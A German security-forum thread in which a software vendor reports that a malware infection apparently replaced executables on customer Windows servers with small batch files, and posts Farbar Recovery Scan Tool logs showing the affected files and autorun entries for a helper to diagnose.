Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Exe-Dateien sind nur noch 4KB groß und unbrauchbar (https://www.trojaner-board.de/176780-exe-dateien-nur-noch-4kb-gross-unbrauchbar.html)

MKai 11.03.2016 11:24
Exe-Dateien sind nur noch 4KB groß und unbrauchbar
 
Hallo,

ich habe seit gestern auf 4 Servern ein Problem, und zwar sind (fast) alle exe-Dateien unbrauchbar. Sie werden zwar mit ihrem korrekten Dateinamen angezeigt, werden aber als Dateityp "Windows-Batchdatei" angezeigt und haben eine Größe von 4KB (3,62 KB).
Der Zeitstempel all dieser manipulierten Dateien ist 10.03.2016 12:45

Alle Anderen Dateitypen scheinen unberührt zu sein!

Kennt ihr eine Schadsoftware die so etwas bewirkt? Ich habe mich bisher leider ohne Erfolg durchs Web gesucht...

Vielen Dank schon mal für eure Hilfe,
Markus.

cosinus 11.03.2016 11:28
Hallo und :hallo:

Hast du noch weitere Logs (mit Funden)? Malwarebytes und/oder andere Virenscanner, sind die mal fündig geworden?

Ich frage deswegen nach => http://www.trojaner-board.de/125889-...tml#post941520

Bitte keine neuen Virenscans machen sondern erst nur schon vorhandene Logs in CODE-Tags posten!
Relevant sind nur Logs der letzten 7 Tage bzw. seitdem das Problem besteht!



Zudem bitte auch ein Log mit Farbars Tool machen:

Scan mit Farbar's Recovery Scan Tool (FRST)

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

MKai 11.03.2016 12:20
Hallo Cosinus,

leider habe ich die Server nicht im direkten Zugriff, da sie bei meinem Kunden vor Ort stehen.
Da die Server keine direkte Verbindung zum I-Net haben und bis gestern unauffälllig ihrer Arbeit nachgegangen sind, habe ich auch keinerlei alte Scan-Logs. :stirn:
Ich habe jedoch meinen Kunden gebeten den FRST-Scan zu machen und mir die Logs zukommen zu lassen, sobald ich sie habe werde ich sie hier posten.

Danke, Markus

cosinus 11.03.2016 12:29
Ähm...:wtf:...ich glaub dann wird das so nix. :(

Du solltest schon auf dem Server vor Ort rankönnen.

Oder ist das echt dein ernst, erst meine Instruktionen zu lesen und diese dann dem Kunden per Telefon mitzuteilen??? :balla:

MKai 14.03.2016 16:40
Hallo Cosinus,

ich kann Dich verstehen, mir passt die Situation auch nicht 100%ig, aber leider ist das Leben kein Wunschkonzert...

Ich bin nur der Softwarehersteller einer der Applikationen die auf den betroffenen Servern läuft. Der Ausfall dieser Server ist auch nicht das Problem, denn es gibt Klone und Backups der Server, so dass eine Bereinigung nicht nötig ist.

Meine Sorge gilt vielmehr meinem eigenen Netz und der Chance einer Infektion. Deshalb habe ich auch im Forum "Plagegeister aller Art..." nachgefragt ob jemand das Problem kennt, da ich nicht sicher bin, ob und wenn ja um welchen Virus es sich handelt.

Ich habe den Kunden trotzdem gebeten FRST auszuführen und mir die Logs zu schicken:

FRST.txt

FRST Logfile:
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Administrator (Administrator) auf MAINDC (11-03-2016 13:08:19)
Gestartet von E:\
Geladene Profile: abt4 & abt5 & Administrator (Verfügbare Profile: abt4 & abt5 & Administrator)
Platform: Windows Server 2008 R2 Standard Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 8 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Fujitsu Technology Solutions) C:\Program Files (x86)\Fujitsu\ServerView Suite\RAID Manager\amService.exe
(Avaya-Tenovis GmbH & Co. KG ) D:\Tenovis\C3000\FSI_Gateway\C3KFSI.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Kiwi Enterprises) C:\Program Files (x86)\Syslogd\Syslogd_Service.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\EngineServer.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Microsoft Corporation) C:\Windows\System32\TCPSVCS.EXE
() D:\Tenovis\C3000\TTrace\tt_srv.exe
(Automic Software GmbH) C:\Automic\ServiceManager\bin\UCYBSMgr.exe
(UC4 Software GmbH) C:\uc4gl08\smgr08\bin\UCYBSMgr.exe
(Microsoft Corporation) C:\Windows\System32\vmms.exe
(Automic Software GmbH) C:\Automic\Agents\Windows\bin\ucxjwx6.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Automic Software GmbH) C:\Automic\Agents\Windows\bin\ucxjwx6.exe
(Automic Software GmbH) C:\Automic\Agents\Windows\bin\ucxjwx6.exe
(Automic Software GmbH) C:\Automic\Agents\Windows\bin\ucxjwx6.exe
(Automic Software GmbH) C:\Automic\Agents\Windows\bin\ucxjwx6.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [rundll32_30289_toolbar] => C:\Windows\@razor.bat [3713 2016-03-10] ()
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [3713 2016-03-10] ()
HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [124240 2009-10-22] (McAfee, Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [3713 2016-03-10] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [3713 2016-03-10] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Java\jre7\bin\jusched.exe"
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
Lsa: [Notification Packages] scecli rassfm
GroupPolicyScripts: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\..\Interfaces\{14B7A5DC-7440-4F5D-B48F-B84DA3EED065}: [NameServer] 10.43.132.61
Tcpip\..\Interfaces\{2973D500-E0EB-413B-9507-B0E22CEBA565}: [NameServer] 10.43.132.61

Internet Explorer:
==================
HKU\S-1-5-21-3090692597-667100711-2265821096-500\Software\Microsoft\Internet Explorer\Main,Start Page = res://iesetup.dll/SoftAdmin.htm
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-10] (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-05-14] (Oracle Corporation)
DPF: HKLM {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} hxxps://10.43.161.83/ADM/configuration/executables/jinstall-1_6_0-win.cab
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-09-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-09-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-09-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-09-20] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\uumnkeg1.default
FF NetworkProxy: "type", 1
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_261.dll [2014-02-17] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_261.dll [2014-02-17] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-05-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-05-14] (Oracle Corporation)
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} [2014-05-21] [ist nicht signiert]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amService; C:\Program Files (x86)\Fujitsu\ServerView Suite\RAID Manager\amService.exe [16896 2013-02-14] (Fujitsu Technology Solutions) [Datei ist nicht signiert]
R2 C3000 FSI Gateway; D:\Tenovis\C3000\FSI_Gateway\C3KFSI.exe [471093 2009-04-06] (Avaya-Tenovis GmbH & Co. KG ) [Datei ist nicht signiert]
S2 clr_optimization_v4.0.30319_32; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [3713 2016-03-10] () [Datei ist nicht signiert]
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-14] (Microsoft Corporation)
R2 Kiwi Syslog Server; C:\Program Files (x86)\Syslogd\Syslogd_Service.exe [1855488 2009-02-09] (Kiwi Enterprises) [Datei ist nicht signiert]
R2 McAfeeEngineService; C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\EngineServer.exe [19720 2009-10-22] (McAfee, Inc.)
R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [120128 2009-09-25] (McAfee, Inc.)
S2 McShield; C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\McShield.exe [3713 2016-03-10] () [Datei ist nicht signiert]
R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe [66896 2009-10-22] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [79504 2009-10-22] (McAfee, Inc.)
S3 MozillaMaintenance; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [3713 2016-03-10] () [Datei ist nicht signiert]
R2 nvspwmi; C:\Windows\system32\nvspwmi.dll [407040 2010-11-21] (Microsoft Corporation)
S3 rqs; C:\Windows\system32\rqs.exe [41472 2010-11-21] (Microsoft Corporation)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-14] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-14] (Microsoft Corporation)
R2 TTrace Server; D:\Tenovis\C3000\TTrace\tt_srv.exe [569413 2004-09-13] () [Datei ist nicht signiert]
R2 UC4.ServiceManager.UC4AE10; C:\Automic\ServiceManager\bin\UCYBSMgr.exe [227616 2014-08-27] (Automic Software GmbH)
R2 UC4.ServiceManager.UC4GL08; c:\uc4gl08\smgr08\bin\UCYBSMgr.exe [348672 2012-09-26] (UC4 Software GmbH) [Datei ist nicht signiert]
R2 vhdsvc; C:\Windows\system32\vhdsvc.dll [193024 2010-11-21] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [4625408 2010-11-21] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 G200e; C:\Windows\System32\DRIVERS\G200em.sys [242688 2011-04-13] (Matrox Graphics Inc.)
R1 hvboot; C:\Windows\System32\drivers\hvboot.sys [118128 2012-08-22] (Microsoft Corporation)
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R0 megasr1; C:\Windows\System32\drivers\megasr1.sys [825680 2012-09-21] (LSI Corporation, Inc.)
S3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [97576 2009-10-22] (McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [119968 2009-10-22] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [469144 2009-10-22] (McAfee, Inc.)
S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [77104 2009-10-22] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [83784 2009-10-22] (McAfee, Inc.)
R3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [20992 2010-11-21] (Microsoft Corporation)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-14] (Microsoft Corporation)
R3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [17408 2010-11-21] (Microsoft Corporation)
R3 VMSMP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)
S3 VMSP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-03-11 13:08 - 2016-03-11 13:08 - 00000000 ____D C:\FRST
2016-03-11 10:02 - 2016-03-11 13:08 - 00000000 ____D C:\Users\Administrator\AppData\Local\Temp\2
2016-03-11 10:02 - 2016-03-11 10:02 - 00198201 _____ C:\Windows\system32\InfList_exe.txt
2016-03-11 10:02 - 2016-03-11 10:02 - 00000000 _____ C:\Windows\system32\FIleList_.exe.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00281112 _____ C:\Windows\InfList_exe.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00014796 _____ C:\Windows\InfList_jpg.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00000034 _____ C:\AUTOEXEC.BAT
2016-03-10 12:49 - 2016-03-10 12:49 - 00000000 _____ C:\Windows\FIleList_.exe.txt
2016-03-10 12:48 - 2016-03-10 12:45 - 00003713 _____ C:\Windows\@razor.bat
2016-02-10 12:43 - 2016-02-10 12:43 - 00000000 ____D C:\IPBS2_v7_2_14

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-03-11 13:06 - 2011-02-11 14:12 - 00667522 _____ C:\Windows\system32\perfh010.dat
2016-03-11 13:06 - 2011-02-11 14:12 - 00127780 _____ C:\Windows\system32\perfc010.dat
2016-03-11 13:06 - 2011-02-11 14:07 - 00367516 _____ C:\Windows\system32\perfh011.dat
2016-03-11 13:06 - 2011-02-11 14:07 - 00104696 _____ C:\Windows\system32\perfc011.dat
2016-03-11 13:06 - 2011-02-11 14:02 - 00673118 _____ C:\Windows\system32\perfh00C.dat
2016-03-11 13:06 - 2011-02-11 14:02 - 00129768 _____ C:\Windows\system32\perfc00C.dat
2016-03-11 13:06 - 2011-02-11 13:59 - 00671694 _____ C:\Windows\system32\perfh00A.dat
2016-03-11 13:06 - 2011-02-11 13:59 - 00138094 _____ C:\Windows\system32\perfc00A.dat
2016-03-11 13:06 - 2011-02-11 13:54 - 00630758 _____ C:\Windows\system32\perfh007.dat
2016-03-11 13:06 - 2011-02-11 13:54 - 00128808 _____ C:\Windows\system32\perfc007.dat
2016-03-11 13:06 - 2009-07-14 06:10 - 04325020 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-11 13:06 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2016-03-11 03:51 - 2013-10-29 08:29 - 00000000 ____D C:\umuser
2016-03-11 03:51 - 2013-10-18 11:06 - 00000000 ____D C:\cti-user
2016-03-10 17:16 - 2013-10-21 15:11 - 00002348 ____H C:\Users\Administrator\Documents\Default.rdp
2016-03-10 16:56 - 2013-10-22 15:55 - 00000000 ____D C:\UC4-CDR
2016-03-10 12:45 - 2015-10-07 07:48 - 00003713 _____ C:\Users\Administrator\Desktop\vcredist_x64.exe
2016-03-10 12:45 - 2015-10-07 06:19 - 00003713 _____ C:\Windows\UCSetup.exe
2016-03-10 12:45 - 2015-10-07 06:19 - 00003713 _____ C:\Windows\ST6UNST.EXE
2016-03-10 12:45 - 2015-10-06 19:42 - 00003713 _____ C:\Users\Administrator\Downloads\Portscanner - CHIP-Installer.exe
2016-03-10 12:45 - 2015-07-13 14:06 - 00003713 _____ C:\Users\Administrator\Desktop\vmrc.exe
2016-03-10 12:45 - 2014-09-17 05:17 - 00003713 _____ C:\Users\Administrator\Desktop\vmrc_neu.exe
2016-03-10 12:45 - 2014-05-21 14:02 - 00003713 _____ C:\Windows\SysWOW64\javaws.exe
2016-03-10 12:45 - 2014-05-21 14:02 - 00003713 _____ C:\Windows\SysWOW64\javaw.exe
2016-03-10 12:45 - 2014-05-21 14:02 - 00003713 _____ C:\Windows\SysWOW64\java.exe
2016-03-10 12:45 - 2014-04-09 17:31 - 00003713 _____ C:\Users\Administrator\Desktop\putty.exe
2016-03-10 12:45 - 2014-02-17 13:49 - 00003713 _____ C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-03-10 12:45 - 2013-11-07 16:23 - 00003713 _____ C:\Users\Administrator\Desktop\vncviewer.exe
2016-03-10 12:45 - 2013-09-15 10:46 - 00003713 _____ C:\Windows\system32\PROUnstl.exe
2016-03-10 12:45 - 2010-11-21 04:24 - 00003713 _____ C:\Windows\system32\vmicsvc.exe
2016-03-10 12:45 - 2004-09-13 04:00 - 00003713 _____ C:\Windows\SysWOW64\instsvr.exe
2016-02-18 11:54 - 2015-10-06 09:27 - 00000000 ____D C:\temp

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-06-18 11:50 - 2015-06-18 11:50 - 0000600 _____ () C:\Users\Administrator\AppData\Roaming\winscp.rnd

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-03-09 00:22

==================== Ende von FRST.txt ============================
--- --- ---


Addition.txt
FRST Additions Logfile:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Administrator (2016-03-11 13:09:05)
Gestartet von E:\
Windows Server 2008 R2 Standard Service Pack 1 (X64) (2013-09-15 09:52:32)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3090692597-667100711-2265821096-500 - Administrator - Enabled) => C:\Users\Administrator
Kunde_fax (S-1-5-21-3090692597-667100711-2265821096-1004 - Administrator - Enabled)
Gast (S-1-5-21-3090692597-667100711-2265821096-501 - Limited - Disabled)
mcafee (S-1-5-21-3090692597-667100711-2265821096-1000 - Administrator - Enabled)
standort4 (S-1-5-21-3090692597-667100711-2265821096-1005 - Limited - Enabled)
abt4 (S-1-5-21-3090692597-667100711-2265821096-1001 - Administrator - Enabled) => C:\Users\abt4
abt5 (S-1-5-21-3090692597-667100711-2265821096-1002 - Administrator - Enabled) => C:\Users\abt5
abtfax (S-1-5-21-3090692597-667100711-2265821096-1003 - Administrator - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)


==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 4.65 (HKLM-x32\...\7-Zip) (Version:  - )
Adobe Flash Player 11 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 11.7.700.261 - Adobe Systems Incorporated)
Adobe Reader X - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AA0000000001}) (Version: 10.0.0 - Adobe Systems Incorporated)
Advanced Port Scanner v1.3 (HKLM-x32\...\Advanced Port Scanner v1.3) (Version:  - )
Avaya Integrated Management Site Administration (HKLM-x32\...\{29914633-C013-43B3-A980-15C1F70DFDB2}) (Version: 6.00.007 - Avaya)
Avaya ProVision (HKLM-x32\...\Avaya ProVision) (Version: 2014.2 - Avaya)
Avaya ProVision (x32 Version: 2014.2 - Avaya) Hidden
C3000 (HKLM-x32\...\InstallShield_{2AD962A7-0EAA-49E9-8CA0-EE341195546F}) (Version: 1.6.053 - Tenovis Comergo GmbH)
C3000 (x32 Version: 1.6.053 - Tenovis Comergo GmbH) Hidden
Fujitsu ServerView PrimeUp (HKLM-x32\...\{794BDE82-3EF9-409C-9E90-5488CB37029C}) (Version: 1.17.01 - Fujitsu Technology Solutions)
Fujitsu ServerView RAID Manager (HKLM\...\{39FE5634-46D7-44A7-A19C-DFFA014FC516}) (Version: 5.6.4 - Fujitsu Technology Solutions)
Intel(R) Network Connections 17.2.154.0 (HKLM\...\PROSetDX) (Version: 17.2.154.0 - Intel)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Java(TM) 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Kiwi Syslog Server 8.3.52  (Service Edition) (HKLM-x32\...\Kiwi Syslog Server) (Version: 8.3.52  (Service Edition) - hxxp://www.kiwisyslog.com)
Matrox Graphics Software (remove only) (HKLM-x32\...\Matrox Graphics Uninstaller) (Version:  - )
McAfee Agent (HKLM-x32\...\{B639A4DE-A375-47D3-89C3-DDCF98D992F7}) (Version: 4.5.0.1270 - McAfee, Inc.)
McAfee VirusScan Enterprise (HKLM-x32\...\{147BCE03-C0F1-4C9F-8157-6A89B6D2D973}) (Version: 8.7.0 - McAfee, Inc.)
Microsoft .NET Framework 4 Client Profile (HKLM-x32\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM-x32\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Mozilla Firefox 19.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 19.0 (x86 de)) (Version: 19.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 19.0 - Mozilla)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.9.2 - )
ServerEngines Pilot/G200e Graphics Driver (remove only) (HKLM\...\Matrox Graphics Uninstaller) (Version:  - )
UC4.ServiceManagerDialog (C:\Automic\ServiceManagerDialog\bin\) (HKLM-x32\...\ST6UNST #1) (Version:  - )
WinSCP 5.7.4 (HKLM-x32\...\winscp3_is1) (Version: 5.7.4 - Martin Prikryl)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {18D4A75B-78B2-40AD-A93E-C554771BF37A} - System32\Tasks\Cti-User Verzeichnis bereinigen => C:\scripte\cti-user-bereinigen.bat [2013-12-03] ()
Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-14] (Microsoft Corporation)
